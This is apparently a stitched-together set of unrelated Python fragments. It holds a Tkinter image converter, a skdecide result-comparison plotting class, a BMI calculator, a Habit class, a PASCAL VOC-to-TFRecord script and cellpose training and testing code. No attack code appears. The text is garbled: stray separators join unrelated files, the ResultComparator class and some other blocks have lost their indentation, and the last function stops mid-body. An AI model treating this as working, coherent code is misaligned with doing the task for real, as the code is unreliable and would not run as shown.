browse_png = tk.Button(text="Select PNG file", command=getPNG, bg="royalblue", fg='white', font=('helvetica', 12, 'bold'))
canvas1.create_window(150, 130, window=browse_png)
def convert():
    """Save the previously selected image under a user-chosen path (default .jpg)."""
    global im1
    export_file_path = filedialog.asksaveasfilename(defaultextension='.jpg')
    # Dialog cancelled: nothing to save.
    if not export_file_path:
        return
    image = im1
    # BUG FIX: JPEG cannot store an alpha channel; PNGs in RGBA/LA/P mode make
    # Image.save raise OSError, so convert them to RGB first.
    if export_file_path.lower().endswith(('.jpg', '.jpeg')) and image.mode in ('RGBA', 'LA', 'P'):
        image = image.convert('RGB')
    image.save(export_file_path)
saveasbutton = tk.Button(text="Convert PNG to JPG", command=convert, bg='royalblue', fg='white', font=('helvetica', 12, 'bold'))
canvas1.create_window(150, 180, window=saveasbutton)

# Start the Tk event loop.
root.mainloop()
from skdecide.builders.discrete_optimization.generic_tools.result_storage.result_storage import ResultStorage, result_storage_to_pareto_front
from typing import List, Tuple, Dict, Union, Set, Any, Optional
from skdecide.builders.discrete_optimization.generic_tools.do_problem import Problem
from skdecide.builders.discrete_optimization.generic_tools.result_storage.result_storage import ParetoFront, plot_pareto_2d, plot_storage_2d
import matplotlib.pyplot as plt
import seaborn as sns
import matplotlib.cm as cm
import numpy as np
import math
class ResultComparator:
list_result_storage: List[ResultStorage]
result_storage_names: List[str]
objectives_str: List[str]
objective_weights: List[int]
test_problems: List[Problem]
super_pareto: ResultStorage
# If test problem is None, then we use the fitnesses from the ResultStorage
def __init__(self, list_result_storage: List[ResultStorage],
result_storage_names: List[str],
objectives_str: List[str],
objective_weights: List[int],
test_problems=None):
self.list_result_storage = list_result_storage
self.result_storage_names = result_storage_names
self.objectives_str = objectives_str
self.objective_weights = objective_weights
self.test_problems = test_problems
self.reevaluated_results = {}
if self.test_problems is not None:
self.reevaluate_result_storages()
def reevaluate_result_storages(self):
for res in self.list_result_storage:
self.reevaluated_results[self.list_result_storage.index(res)] = {}
for obj in self.objectives_str:
self.reevaluated_results[self.list_result_storage.index(res)][obj] = []
for scenario in self.test_problems:
# res.list_solution_fits[0][0].change_problem(scenario)
# val = scenario.evaluate(res.list_solution_fits[0][0])[obj]
res.get_best_solution().change_problem(scenario)
val = scenario.evaluate(res.get_best_solution())[obj]
self.reevaluated_results[self.list_result_storage.index(res)][obj].append(val)
print('reevaluated_results: ', self.reevaluated_results)
def plot_distribution_for_objective(self, objective_str: str):
obj_index = self.objectives_str.index(objective_str)
fig, ax = plt.subplots(1, figsize=(10, 10))
for i in range(len(self.result_storage_names)):
sns.distplot(self.reevaluated_results[i][objective_str],
rug=True,
bins=max(1, len(self.reevaluated_results[i][objective_str]) // 10),
label=self.result_storage_names[i],
ax=ax)
ax.legend()
ax.set_title(objective_str.upper()+" distribution over test instances, for different optimisation approaches")
return fig
def print_test_distribution(self):
...
def get_best_by_objective_by_result_storage(self, objectif_str: str):
obj_index = self.objectives_str.index(objectif_str)
# print('obj_index: ', obj_index)
val = {}
for i in range(len(self.list_result_storage)):
fit_array = [self.list_result_storage[i].list_solution_fits[j][1].vector_fitness[obj_index]
for j in range(len(self.list_result_storage[i].list_solution_fits))] # create fit array
# self.objective_weights[obj_index] > 0:
if self.list_result_storage[i].maximize:
best_fit = max(fit_array)
else:
best_fit = min(fit_array)
# best_fit = max(fit_array)
best_index = fit_array.index(best_fit)
best_sol = self.list_result_storage[i].list_solution_fits[best_index]
# print('fit_array:', fit_array)
# print('best_sol:', best_sol)
val[self.result_storage_names[i]] = best_sol
return val
def generate_super_pareto(self):
sols = []
for rs in self.list_result_storage:
for s in rs.list_solution_fits:
sols.append(s)
rs = ResultStorage(list_solution_fits=sols, best_solution=None)
# print('len(rs): ', len(rs.list_solution_fits))
pareto_store = result_storage_to_pareto_front(result_storage=rs, problem=None)
# print('len(pareto_store): ', len(pareto_store.list_solution_fits))
# print('hhhh: ', [x[1].vector_fitness for x in pareto_store.list_solution_fits])
return pareto_store
def plot_all_2d_paretos_single_plot(self,
objectives_str=None):
if objectives_str is None:
objecives_names = self.objectives_str[:2]
objectives_index = [0,1]
else:
objecives_names = objectives_str
objectives_index = []
for obj in objectives_str:
obj_index = self.objectives_str.index(obj)
objectives_index.append(obj_index)
colors = cm.rainbow(np.linspace(0, 1, len(self.list_result_storage)))
fig, ax = plt.subplots(1)
ax.set_xlabel(objecives_names[0])
ax.set_ylabel(objecives_names[1])
for i in range(len(self.list_result_storage)):
ax.scatter(x=[p[1].vector_fitness[objectives_index[0]]
for p in self.list_result_storage[i].list_solution_fits],
y=[p[1].vector_fitness[objectives_index[1]]
for p in self.list_result_storage[i].list_solution_fits],
color=colors[i])
ax.legend(self.result_storage_names)
return ax
def plot_all_2d_paretos_subplots(self, objectives_str=None):
    """Scatter-plot two objectives for each result storage, one subplot per
    storage, laid out in 2 columns.

    objectives_str: optional pair of objective names; defaults to the first
    two objectives. Returns the matplotlib figure.

    Fix: removed a leftover debug ``print(axs.shape)``.
    """
    if objectives_str is None:
        objectives_names = self.objectives_str[:2]
        objectives_index = [0, 1]
    else:
        objectives_names = objectives_str
        objectives_index = [self.objectives_str.index(obj) for obj in objectives_str]
    cols = 2
    rows = math.ceil(len(self.list_result_storage) / cols)
    fig, axs = plt.subplots(rows, cols)
    # flatten() works for both the 1-D (rows == 1) and 2-D axes arrays
    axis = axs.flatten()
    colors = cm.rainbow(np.linspace(0, 1, len(self.list_result_storage)))
    for i, ax in zip(range(len(self.list_result_storage)), axis[:len(self.list_result_storage)]):
        x = [p[1].vector_fitness[objectives_index[0]]
             for p in self.list_result_storage[i].list_solution_fits]
        y = [p[1].vector_fitness[objectives_index[1]]
             for p in self.list_result_storage[i].list_solution_fits]
        ax.scatter(x=x, y=y, color=colors[i])
        ax.set_title(self.result_storage_names[i])
    fig.tight_layout(pad=3.0)
    return fig
def plot_super_pareto(self):
    """Plot in 2D the merged ('super') pareto front built from the
    solutions of all result storages (see generate_super_pareto)."""
    super_pareto = self.generate_super_pareto()
    # plot_storage_2d(result_storage=super_pareto, name_axis=self.objectives_str)
    plot_pareto_2d(pareto_front=super_pareto, name_axis=self.objectives_str)
    # TODO: This one is not working ! Need to check why
    plt.title('Pareto front obtained by merging solutions from all result stores')
def plot_all_best_by_objective(self, objectif_str):
    """Bar chart comparing, per result storage, the best fitness value
    reached on the objective named ``objectif_str``."""
    obj_index = self.objectives_str.index(objectif_str)
    best_by_storage = self.get_best_by_objective_by_result_storage(objectif_str)
    names = list(best_by_storage.keys())
    values = [best_by_storage[name][1].vector_fitness[obj_index] for name in names]
    positions = np.arange(len(names))
    plt.bar(positions, values)
    plt.xticks(positions, names, rotation=45)
    plt.title('Comparison on ' + objectif_str)
    # plt.show()
|
# BMI calculator: weight entered in kilograms, height entered in centimetres.
# float() replaces eval(): eval executes arbitrary user input (code injection).
weight = float(input("Input you weight in KG\n"))
height = float(input("Input you Height in CM\n"))
# BMI = weight(kg) / height(m)^2 -- the height must be converted from cm to m
# first; the original divided by centimetres squared, off by a factor of 10000.
height_m = height / 100
BMI = weight / (height_m * height_m)
print("Your BMI is =", BMI)
class Habit:
    """A named habit with a quota to fulfil over a given period."""

    def __init__(self, name, quota, period):
        self.name = name      # habit label
        self.quota = quota    # how many times the habit should be done
        self.period = period  # time span over which the quota applies

    def __repr__(self):
        # name and quota are rendered inside quotes, period bare
        return "Habit('{0}', '{1}', {2})".format(self.name, self.quota, self.period)
"""Convert raw PASCAL VOC dataset to TFRecord for object detection.
The Example proto contains the following fields:
image/encoded: string, containing JPEG image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/format: string, specifying the format, like 'JPEG'
image/object/bbox/xmin: list of float specifying the bboxes.
image/object/bbox/xmax: list of float specifying the bboxes.
image/object/bbox/ymin: list of float specifying the bboxes.
image/object/bbox/ymax: list of float specifying the bboxes.
image/object/bbox/label: list of integer specifying the classification index.
"""
import os
import sys
import random
import numpy as np
import tensorflow as tf
from xml.etree import ElementTree
from utils.dataset_util import write_label_file
from datasets.pascal2012 import VOC_LABELS, SPLIT_TO_SIZES
from utils.dataset_util import int64_list_feature, bytes_list_feature, float_list_feature, \
bytes_feature, int64_feature
DIRECTORY_ANNOTATIONS = 'Annotations/'
DIRECTORY_IMAGES = 'JPEGImages/'
# The number of images(total 17125) in the validation set.
_NUM_VALIDATION = SPLIT_TO_SIZES['validation']
# Seed for repeatability
_RANDOM_SEED = 123
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset_dir', '', 'The dataset directory where the dataset is stored.')
tf.app.flags.DEFINE_string('meta_directory', '', 'The directory containing images and annotations dir')
def _image_to_tfexample(image_name, annotation_name):
    """Build a tf.train.Example from a JPEG image file and its VOC XML
    annotation file.

    Bounding-box coordinates are normalized by the image width/height.
    """
    image_data = tf.gfile.FastGFile(image_name, 'rb').read()
    tree = ElementTree.parse(annotation_name)
    root = tree.getroot()
    # image shape
    size = root.find('size')
    height = int(size.find('height').text)
    width = int(size.find('width').text)
    channels = int(size.find('depth').text)
    # image annotations
    xmin = []
    xmax = []
    ymin = []
    ymax = []
    labels = []
    labels_text = []
    difficult = []
    truncated = []
    for obj in root.findall('object'):
        label_name = obj.find('name').text
        labels.append(int(VOC_LABELS[label_name][0]))
        labels_text.append(label_name.encode('ascii'))
        # BUG FIX: compare against None explicitly. An ElementTree Element
        # with no children is falsy, so `if obj.find('difficult'):` was
        # always False for text-only tags and every flag ended up 0.
        difficult_node = obj.find('difficult')
        difficult.append(int(difficult_node.text) if difficult_node is not None else 0)
        truncated_node = obj.find('truncated')
        truncated.append(int(truncated_node.text) if truncated_node is not None else 0)
        bbox = obj.find('bndbox')
        xmin.append(float(bbox.find('xmin').text) / width)
        xmax.append(float(bbox.find('xmax').text) / width)
        ymin.append(float(bbox.find('ymin').text) / height)
        ymax.append(float(bbox.find('ymax').text) / height)
    example = tf.train.Example(features=tf.train.Features(feature={
        'image/encoded': bytes_feature(image_data),
        'image/format': bytes_feature(b'JPEG'),
        'image/height': int64_feature(height),
        'image/width': int64_feature(width),
        'image/channels': int64_feature(channels),
        'image/object/bbox/xmin': float_list_feature(xmin),
        'image/object/bbox/xmax': float_list_feature(xmax),
        'image/object/bbox/ymin': float_list_feature(ymin),
        'image/object/bbox/ymax': float_list_feature(ymax),
        'image/object/bbox/label': int64_list_feature(labels),
        'image/object/bbox/text': bytes_list_feature(labels_text),
        'image/object/bbox/difficult': int64_list_feature(difficult),
        'image/object/bbox/truncated': int64_list_feature(truncated),
    }))
    return example
def _get_dataset_name(dataset_dir, split_name):
output_filename = 'data_%s.tfrecord' % split_name
return os.path.join(dataset_dir, output_filename)
def _dataset_exist(dataset_dir):
    """Return True when TFRecord files for both splits already exist."""
    return all(
        tf.gfile.Exists(_get_dataset_name(dataset_dir, split))
        for split in ('train', 'validation')
    )
def _get_filenames(dataset_dir):
    """Return the base names (extension stripped) of the files found under
    the JPEGImages/ directory.

    Fix: uses os.path.splitext instead of slicing off the last 4 characters,
    which silently corrupted names with extensions of any other length.
    """
    image_dir = os.path.join(dataset_dir, DIRECTORY_IMAGES)
    return [os.path.splitext(filename)[0] for filename in os.listdir(image_dir)]
def _convert_dataset(split_name, filenames, dataset_dir, meta_dir):
    """Convert the given filenames to a TFRecord dataset."""
    assert split_name in ['train', 'validation']
    output_filename = _get_dataset_name(dataset_dir, split_name)
    total = len(filenames)
    with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
        for index, base_name in enumerate(filenames):
            # in-place progress line
            sys.stdout.write('\r>> Converting image %d/%d to %s dataset.' % (index + 1, total, split_name))
            sys.stdout.flush()
            image_path = os.path.join(meta_dir, DIRECTORY_IMAGES, base_name + '.jpg')
            annotation_path = os.path.join(meta_dir, DIRECTORY_ANNOTATIONS, base_name + '.xml')
            # skip samples missing either the image or the annotation
            if tf.gfile.Exists(image_path) and tf.gfile.Exists(annotation_path):
                example = _image_to_tfexample(image_path, annotation_path)
                tfrecord_writer.write(example.SerializeToString())
    sys.stdout.write('\n')
    sys.stdout.flush()
def main(_):
    """Run the conversion operation: split the images into train/validation,
    write one TFRecord per split, and write the labels file."""
    if not tf.gfile.Exists(FLAGS.dataset_dir):
        tf.gfile.MakeDirs(FLAGS.dataset_dir)
    if _dataset_exist(FLAGS.dataset_dir):
        print('Dataset files already exist. Exiting without recreating files.')
        return
    classes_id_to_name = {value[0]: key for key, value in VOC_LABELS.items()}
    meta_filenames = _get_filenames(FLAGS.meta_directory)
    # Divide into training and validation.
    # BUG FIX: seed with the fixed _RANDOM_SEED so the split is
    # reproducible; random.seed() without an argument made every run
    # produce a different split despite the seed being declared
    # "for repeatability".
    random.seed(_RANDOM_SEED)
    random.shuffle(meta_filenames)
    train_filenames = meta_filenames[_NUM_VALIDATION:]
    validation_filenames = meta_filenames[:_NUM_VALIDATION]
    # convert the training and validation splits
    _convert_dataset('train', train_filenames, FLAGS.dataset_dir, FLAGS.meta_directory)
    _convert_dataset('validation', validation_filenames, FLAGS.dataset_dir, FLAGS.meta_directory)
    # write the labels file
    write_label_file(classes_id_to_name, FLAGS.dataset_dir)
    print('\nFinished converting the PASCAL VOC dataset.')
if __name__ == '__main__':
tf.app.run()
|
"""
Copright © 2023 Howard Hughes Medical Institute, Authored by Carsen Stringer and Marius Pachitariu.
"""
import sys, os, time, string, shutil
from natsort import natsorted
from glob import glob
from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
import mxnet as mx
import matplotlib.pyplot as plt
from matplotlib import rc
import cv2
from scipy import stats
from cellpose import models, datasets, utils, transforms, io, metrics
thresholds = np.arange(0.5, 1.05, 0.05)
def get_pretrained_models(model_root, unet=0, nclass=3, residual=1, style=1, concatenate=0):
    """Return the naturally-sorted model paths that match the requested
    architecture options, excluding .npy files."""
    on_off = ['off', 'on']
    arch = 'unet%d' % nclass if unet else 'cellpose'
    pattern = '%s%s_residual_%s_style_%s_concatenation_%s' % (
        model_root, arch, on_off[residual], on_off[style], on_off[concatenate])
    return [path for path in natsorted(glob(pattern + '*'))
            if not path.endswith('.npy')]
def make_kfold_data(data_root):
    """Use the cellpose train+test images to build 9 cross-validation folds.

    Fixes two defects in the original:
    - ``ntot`` was never defined (NameError at the first modulo).
    - the train file lists were overwritten by the (68-entry) test lists,
      so any index >= 68 would have raised IndexError; the lists must be
      concatenated instead (train files first, then test files).
    """
    ntest = 68
    ntrain = 540
    ntot = ntrain + ntest
    # full pool of images/labels/flows: train files first, then test files
    train_root = os.path.join(data_root, 'train/')
    imgs = [os.path.join(train_root, '%03d_img.tif' % i) for i in range(ntrain)]
    labels = [os.path.join(train_root, '%03d_masks.tif' % i) for i in range(ntrain)]
    flow_labels = [os.path.join(train_root, '%03d_img_flows.tif' % i) for i in range(ntrain)]
    test_root = os.path.join(data_root, 'test/')
    imgs += [os.path.join(test_root, '%03d_img.tif' % i) for i in range(ntest)]
    labels += [os.path.join(test_root, '%03d_masks.tif' % i) for i in range(ntest)]
    flow_labels += [os.path.join(test_root, '%03d_img_flows.tif' % i) for i in range(ntest)]
    # shuffle train and test indices separately, then rotate windows of
    # size ntrain / ntest over the combined permutation per fold
    all_inds = np.hstack((np.random.permutation(ntrain), np.random.permutation(ntest) + ntrain))
    for j in range(9):
        root_train = os.path.join(data_root, 'train%d/' % j)
        root_test = os.path.join(data_root, 'test%d/' % j)
        os.makedirs(root_train, exist_ok=True)
        os.makedirs(root_test, exist_ok=True)
        train_inds = all_inds[np.arange(j * ntest, j * ntest + ntrain, 1, int) % ntot]
        test_inds = all_inds[np.arange(j * ntest + ntrain, (j + 1) * ntest + ntrain, 1, int) % ntot]
        for i, ind in enumerate(train_inds):
            shutil.copyfile(imgs[ind], os.path.join(root_train, '%03d_img.tif' % i))
            shutil.copyfile(labels[ind], os.path.join(root_train, '%03d_masks.tif' % i))
            shutil.copyfile(flow_labels[ind], os.path.join(root_train, '%03d_img_flows.tif' % i))
        for i, ind in enumerate(test_inds):
            shutil.copyfile(imgs[ind], os.path.join(root_test, '%03d_img.tif' % i))
            shutil.copyfile(labels[ind], os.path.join(root_test, '%03d_masks.tif' % i))
            shutil.copyfile(flow_labels[ind], os.path.join(root_test, '%03d_img_flows.tif' % i))
def train_unets(data_root):
    """ train unets with 3 or 2 classes and different architectures (12 networks total) """
    # can also run on command line for GPU cluster
    # python -m cellpose --train --use_gpu --dir images_cyto/train/ --test_dir images_cyto/test/ --img_filter _img --pretrained_model None --chan 2 --chan2 1 --unet "$1" --nclasses "$2" --learning_rate "$3" --residual_on "$4" --style_on "$5" --concatenation "$6"
    device = mx.gpu()
    # count samples from the image files present on disk
    ntest = len(glob(os.path.join(data_root, 'test/*_img.tif')))
    ntrain = len(glob(os.path.join(data_root, 'train/*_img.tif')))
    channels = [2,1]
    # three architecture variants; index k selects one column across
    # the four lists below
    concatenation = [1, 1, 0]
    residual_on = [0, 0, 1]
    style_on = [0, 0, 1]
    nclasses = [3, 2, 3]
    # load images
    train_root = os.path.join(data_root, 'train/')
    train_data = [io.imread(os.path.join(train_root, '%03d_img.tif'%i)) for i in range(ntrain)]
    train_labels = [io.imread(os.path.join(train_root, '%03d_masks.tif'%i)) for i in range(ntrain)]
    test_root = os.path.join(data_root, 'test/')
    test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
    test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
    # train networks
    for k in range(len(concatenation)):
        # 4 nets for each architecture variant (3 * 4 = 12 networks)
        for l in range(4):
            model = models.UnetModel(device=device,
                                     pretrained_model=None,
                                     diam_mean=30,
                                     residual_on=residual_on[k],
                                     style_on=style_on[k],
                                     concatenation=concatenation[k])
            model.train(train_data, train_labels, test_data, test_labels,
                        channels=channels, rescale=True,
                        save_path=train_root)
def test_unets_main(data_root, save_root):
    """ data_root is folder with folders images_.../train/models/, images_cyto/test and images_nuclei/test """
    #model_types = ['cyto', 'cyto_sp', 'nuclei']
    for model_type in ('cyto_sp', 'nuclei'):
        # models live under the model-type folder; test images live under
        # the base type (prefix before '_')
        trained_root = os.path.join(data_root, 'images_%s/train/models/' % model_type)
        eval_root = os.path.join(data_root, 'images_%s/test/' % model_type.split('_')[0])
        test_unets(trained_root, eval_root, save_root, model_type)
def test_unets(model_root, test_root, save_root, model_type='cyto'):
    """ test trained unets """
    device=mx.gpu()
    ntest = len(glob(os.path.join(test_root, '*_img.tif')))
    # cyto-style models use [cytoplasm=2, nucleus=1] channels,
    # everything else is treated as grayscale
    if model_type[:4]=='cyto':
        channels = [2,1]
    else:
        channels = [0,0]
    # architecture variants (same columns as in train_unets)
    concatenation = [1, 1, 0]
    residual_on = [0, 0, 1]
    style_on = [0, 0, 1]
    nclasses = [3, 2, 3]
    sstr = ['off', 'on']
    # aps[architecture, image, iou-threshold] -> average precision
    aps = np.zeros((len(concatenation),ntest,len(thresholds)))
    test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
    test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
    # rescale each image from its predicted diameter to the reference
    # diameter (30 for cyto, 17 otherwise); the specialized 'cyto_sp' set
    # has no predicted diameters and is not rescaled
    if model_type!='cyto_sp':
        dat = np.load(os.path.join(test_root, 'predicted_diams.npy'), allow_pickle=True).item()
        if model_type=='cyto':
            rescale = 30. / dat['predicted_diams']
        else:
            rescale = 17. / dat['predicted_diams']
    else:
        rescale = np.ones(len(test_data))
    # NOTE(review): only the first architecture (k=0) is evaluated here;
    # the full range is deliberately commented out
    for k in range(1):#len(concatenation)):
        pretrained_models = get_pretrained_models(model_root, 1, nclasses[k],
                                                  residual_on[k], style_on[k],
                                                  concatenation[k])
        print(pretrained_models)
        model = models.UnetModel(device=device,
                                 pretrained_model=pretrained_models)
        # net_avg=True averages the 4 trained nets of this architecture
        masks = model.eval(test_data, channels=channels, rescale=rescale, net_avg=True)[0]
        ap = metrics.average_precision(test_labels, masks,
                                       threshold=thresholds)[0]
        # mean AP at IoU thresholds 0.5, 0.75 and 0.9
        print(ap[:,[0,5,8]].mean(axis=0))
        aps[k] = ap
        np.save(os.path.join(save_root,
                'unet%d_residual_%s_style_%s_concatenation_%s_%s_masks.npy'%(nclasses[k], sstr[residual_on[k]],
                sstr[style_on[k]], sstr[concatenation[k]], model_type)),
                masks)
def train_cellpose_nets(data_root):
    """Train cellpose networks on the 9 data folds (5 architectures x 4
    nets x 9 folds = 180 networks total) ... ~1 week on one GPU.

    Fixes two defects in the original:
    - ``model.train`` was called with three undefined names
      (``images``, ``labels``, ``test_images``) -> NameError;
    - the flow-label concatenation used the whole flow-label list instead
      of the i-th entry.
    """
    # can also run on command line for GPU cluster
    # python -m cellpose --train --use_gpu --dir images_cyto/train"$7"/ --test_dir images_cyto/test"$7"/ --img_filter _img --pretrained_model None --chan 2 --chan2 1 --unet "$1" --nclasses "$2" --learning_rate "$3" --residual_on "$4" --style_on "$5" --concatenation "$6"
    device = mx.gpu()
    ntest = 68
    ntrain = 540
    # five architecture variants; index k selects one column
    concatenation = [0, 0, 0, 1, 1]
    residual_on = [1, 1, 0, 1, 0]
    style_on = [1, 0, 1, 1, 0]
    channels = [2, 1]
    for j in range(9):
        # load images, then stack each mask with its own flow labels on axis 0
        train_root = os.path.join(data_root, 'train%d/' % j)
        train_data = [io.imread(os.path.join(train_root, '%03d_img.tif' % i)) for i in range(ntrain)]
        train_labels = [io.imread(os.path.join(train_root, '%03d_masks.tif' % i)) for i in range(ntrain)]
        train_flow_labels = [io.imread(os.path.join(train_root, '%03d_img_flows.tif' % i)) for i in range(ntrain)]
        # BUG FIX: index the per-image flow labels; the original passed the
        # whole list into np.concatenate for every image
        train_labels = [np.concatenate((train_labels[i][np.newaxis, :, :], train_flow_labels[i]), axis=0)
                        for i in range(ntrain)]
        test_root = os.path.join(data_root, 'test%d/' % j)
        test_data = [io.imread(os.path.join(test_root, '%03d_img.tif' % i)) for i in range(ntest)]
        test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif' % i)) for i in range(ntest)]
        test_flow_labels = [io.imread(os.path.join(test_root, '%03d_img_flows.tif' % i)) for i in range(ntest)]
        test_labels = [np.concatenate((test_labels[i][np.newaxis, :, :], test_flow_labels[i]), axis=0)
                       for i in range(ntest)]
        # train networks
        for k in range(len(concatenation)):
            # 4 nets for each architecture
            for l in range(4):
                model = models.CellposeModel(device=device,
                                             pretrained_model=None,
                                             diam_mean=30,
                                             residual_on=residual_on[k],
                                             style_on=style_on[k],
                                             concatenation=concatenation[k])
                # BUG FIX: use the names actually defined above
                model.train(train_data, train_labels, test_data=test_data, test_labels=test_labels,
                            channels=channels, rescale=True,
                            save_path=train_root)
                # train size network on the default architecture once per fold
                if k == 0 and l == 0:
                    sz_model = models.SizeModel(model, device=device)
                    sz_model.train(train_data, train_labels, test_data, test_labels, channels=channels)
                    predicted_diams, diams_style = sz_model.eval(test_data, channels=channels)
                    # lbl[0] is the mask plane of the stacked labels
                    tlabels = [lbl[0] for lbl in test_labels]
                    ccs = np.corrcoef(diams_style, np.array([utils.diameters(lbl)[0] for lbl in tlabels]))[0, 1]
                    cc = np.corrcoef(predicted_diams, np.array([utils.diameters(lbl)[0] for lbl in tlabels]))[0, 1]
                    print('style test correlation: %0.4f; final test correlation: %0.4f' % (ccs, cc))
                    np.save(os.path.join(test_root, 'predicted_diams.npy'),
                            {'predicted_diams': predicted_diams, 'diams_style': diams_style})
def test_cellpose_main(data_root, save_root):
    """ data_root is folder with folders images_cyto_sp/train/models/, images_cyto/test and images_nuclei/test """
    #model_types = ['cyto', 'cyto_sp', 'nuclei']
    model_types = ['nuclei']
    for model_type in model_types:
        # built-in cyto/nuclei ensembles live in ~/.cellpose/models;
        # the specialized model comes from this repo's training folder
        if model_type == 'cyto' or model_type == 'nuclei':
            pretrained_models = [str(Path.home().joinpath('.cellpose/models/%s_%d' % (model_type, j))) for j in range(4)]
        else:
            pretrained_models = glob(os.path.join(data_root, 'images_cyto_sp/train/models/cellpose_*'))
        test_root = os.path.join(data_root, 'images_%s/test/' % model_type.split('_')[0])
        print(test_root, pretrained_models)
        # BUG FIX: pass model_type by keyword -- positionally it landed on
        # test_cellpose's diam_file parameter and model_type silently kept
        # its 'cyto' default.
        test_cellpose(test_root, save_root, pretrained_models, model_type=model_type)
def test_timing(test_root, save_root):
    """Time cellpose eval on 100 copies of one image, GPU vs CPU, for
    three crop sizes, with and without 4-net averaging.

    NOTE(review): save_root is currently unused; timings are only printed.
    """
    itest=14
    test_data = io.imread(os.path.join(test_root, '%03d_img.tif'%itest))
    dat = np.load(os.path.join(test_root, 'predicted_diams.npy'), allow_pickle=True).item()
    # rescale this image from its predicted diameter to the 30px reference
    rescale = 30. / dat['predicted_diams'][itest]
    # assumes test_data is (channels, Ly, Lx) -- transposed to HWC for cv2
    Ly, Lx = test_data.shape[1:]
    test_data = cv2.resize(np.transpose(test_data, (1,2,0)), (int(Lx*rescale), int(Ly*rescale)))
    devices = [mx.gpu(), mx.cpu()]
    bsize = [256, 512, 1024]
    # t100[device, crop-size, net_avg] = seconds for the 100-image batch
    t100 = np.zeros((2,3,2))
    for d,device in enumerate(devices):
        model = models.CellposeModel(device=device, pretrained_model=None)
        for j in range(3):
            # tile the image 2x2 before the largest crop so 1024px fits
            if j==2:
                test_data = np.tile(test_data, (2,2,1))
            img = test_data[:bsize[j], :bsize[j]]
            imgs = [img for i in range(100)]
            # k=0: single net, k=1: 4-net average
            for k in [0,1]:
                tic = time.time()
                masks = model.eval(imgs, channels=[2,1], rescale=1.0, net_avg=k)[0]
                print(masks[0].max())
                t100[d,j,k] = time.time()-tic
                print(t100[d,j,k])
def test_cellpose(test_root, save_root, pretrained_models, diam_file=None, model_type='cyto'):
    """Test a single cellpose net or a 4-net average and save the masks.

    Fix: the channel selection tested ``model_type[:4] != 'nuclei'``, which
    is always True (a 4-char slice can never equal a 6-char string), so
    nuclei models wrongly got cyto channels. The check now mirrors
    test_unets and keys on the 'cyto' prefix.
    """
    device = mx.gpu()
    ntest = len(glob(os.path.join(test_root, '*_img.tif')))
    # cyto-style models use [cytoplasm=2, nucleus=1]; nuclei use grayscale
    if model_type[:4] == 'cyto':
        channels = [2, 1]
    else:
        channels = [0, 0]
    test_data = [io.imread(os.path.join(test_root, '%03d_img.tif' % i)) for i in range(ntest)]
    # saved diameters: rescale to the 30px (cyto) / 17px (nuclei) reference;
    # the specialized 'cyto_sp' set is not rescaled
    if model_type != 'cyto_sp':
        if diam_file is None:
            dat = np.load(os.path.join(test_root, 'predicted_diams.npy'), allow_pickle=True).item()
        else:
            dat = np.load(diam_file, allow_pickle=True).item()
        if model_type == 'cyto':
            rescale = 30. / dat['predicted_diams']
        else:
            rescale = 17. / dat['predicted_diams']
    else:
        rescale = np.ones(len(test_data))
    model = models.CellposeModel(device=device, pretrained_model=pretrained_models)
    masks = model.eval(test_data, channels=channels, rescale=rescale)[0]
    np.save(os.path.join(save_root, 'cellpose_%s_masks.npy' % model_type), masks)
def test_nets_3D(stack, model_root, save_root, test_region=None):
    """ input 3D stack and test_region (where ground truth is labelled) """
    device = mx.gpu()
    # NOTE(review): only the 3-class unet is active; the other two
    # architectures are commented out
    model_archs = ['unet3']#, 'unet2', 'cellpose']
    # found thresholds using ground truth
    cell_thresholds = [3., 0.25]
    boundary_thresholds = [0., 0.]
    for m,model_arch in enumerate(model_archs):
        if model_arch=='cellpose':
            # 4-net cellpose ensemble from the user's home model folder
            pretrained_models = [str(Path.home().joinpath('.cellpose/models/cyto_%d'%j)) for j in range(4)]
            model = models.CellposeModel(device=device, pretrained_model=pretrained_models)
            # rescale 30/25: presumably 30px model diameter vs ~25px cells
            # in this stack -- TODO confirm
            masks = model.eval(stack, channels=[2,1], rescale=30./25.,
                               do_3D=True, min_size=2000)[0]
        else:
            # unet ensemble matching the requested class count
            pretrained_models = get_pretrained_models(model_root, unet=1, nclass=int(model_arch[-1]),
                                                      residual=0, style=0, concatenate=1)
            model = models.UnetModel(device=device, pretrained_model=pretrained_models)
            masks = model.eval(stack, channels=[2,1], rescale=30./25.,
                               do_3D=True, min_size=2000, cell_threshold=cell_thresholds[m],
                               boundary_threshold=boundary_thresholds[m])[0]
        # restrict to the labelled region before cleanup, then drop holes
        # and masks smaller than 2000 voxels
        if test_region is not None:
            masks = masks[test_region]
        masks = utils.fill_holes_and_remove_small_masks(masks, min_size=2000)
        np.save(os.path.join(save_root, '%s_3D_masks.npy'%model_arch), masks)
def test_cellpose_kfold_aug(data_root, save_root):
    """ test trained cellpose networks on all cyto images """
    # Same evaluation as test_cellpose_kfold but with test-time
    # augmentation (augment=True) and only the default architecture.
    # NOTE(review): save_root is unused here; the AP array is returned.
    device = mx.gpu()
    ntest = 68
    concatenation = [0]
    residual_on = [1]
    style_on = [1]
    channels = [2,1]
    # aps[fold, image, iou-threshold] -> average precision
    aps = np.zeros((9,68,len(thresholds)))
    for j in range(9):
        train_root = os.path.join(data_root, 'train%d/'%j)
        model_root = os.path.join(train_root, 'models/')
        test_root = os.path.join(data_root, 'test%d/'%j)
        test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
        test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
        k=0
        pretrained_models = get_pretrained_models(model_root, 0, 3,
                                                  residual_on[k], style_on[k],
                                                  concatenation[k])
        print(pretrained_models)
        cp_model = models.CellposeModel(device=device,
                                        pretrained_model=pretrained_models)
        # test_root ends with '/' so plain concatenation forms a valid path
        dat = np.load(test_root+'predicted_diams.npy', allow_pickle=True).item()
        # rescale from predicted to the 30px reference diameter
        rescale = 30. / dat['predicted_diams']
